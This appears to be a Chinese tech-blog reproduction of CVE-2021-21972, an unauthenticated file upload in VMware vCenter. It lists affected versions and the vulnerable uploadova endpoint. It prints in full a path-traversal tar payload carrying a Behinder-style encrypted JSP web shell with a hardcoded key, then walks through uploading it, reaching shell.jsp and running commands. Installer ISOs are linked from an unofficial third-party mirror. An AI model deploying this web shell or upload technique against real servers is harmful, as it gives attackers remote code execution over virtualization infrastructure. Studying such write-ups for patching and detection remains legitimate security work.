如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

本篇文章给大家分享的是有关如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

Vmware vcenter未授权任意文件上传(CVE-2021-21972 )

一、漏洞简介

VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。

高危严重漏洞:

在 CVE-2021-21972 VMware vCenter Server 远程代码漏洞 中,攻击者可直接通过443端口构造恶意请求,执行任意代码,控制vCenter。

漏洞为任意文件上传:

存在问题的接口为

/ui/vropspluginui/rest/services/uploadova,

完整路径

(https://ip:port/ui/vropspluginui/rest/services/uploadova)

二、影响版本

VMware vCenter Server 7.0系列 < 7.0.U1c

VMware vCenter Server 6.7系列 < 6.7.U3l

VMware vCenter Server 6.5系列 < 6.5 U3n

VMware ESXi 7.0系列 < ESXi70U1c-17325551

VMware ESXi 6.7系列 < ESXi670-202102401-SG

VMware ESXi 6.5系列 < ESXi650-202102101-SG

三、环境准备&漏洞复现

安装EXSI 7.0.0  VMware vSphere虚拟机监控程序(ESXi) 链接:https://cld16.irans3.com/dlir-s3/VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso VMware-VMvisor-Installer-7.0.0-15843807.x86_64.iso档案大小:350 MB MD5:220d2e87290f50c3508214cadf66b737 SHA1:7fda0401ee1b2f49aae89043f9b2d509cf7e25db 安装:https://blog.51cto.com/10802692/2409826  下载 vCenter Server  VMware vCenter Server 链接:https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso VMware-VCSA-all-7.0.0-15952498.iso档案大小:6.42 GB MD5:94bb30ae83cd5f12e2eecce114d43007 SHA1:17aa2b1ee20e977fb4f8f8391563f57c3e456361 安装:https://blog.csdn.net/qq_38028248/article/details/107712839 (环境安装参考来源:作者: print("")师傅环境部署)

midi.tar(后台回复:"vmware")获取

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h6ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>

https://ip:port/ui/vropspluginui/rest/services/uploadova

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

返回sucess证明上传tar成功

访问shell地址:

https://127.0.0.1/ui/resources/shell.jsp

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

连接木马shell:

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

相关命令执行:

如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现

以上就是如何实现Vmware vcenter未授权任意文件上传CVE-2021-21972复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

原创文章,作者:745907710,如若转载,请注明出处:https://blog.ytso.com/220140.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论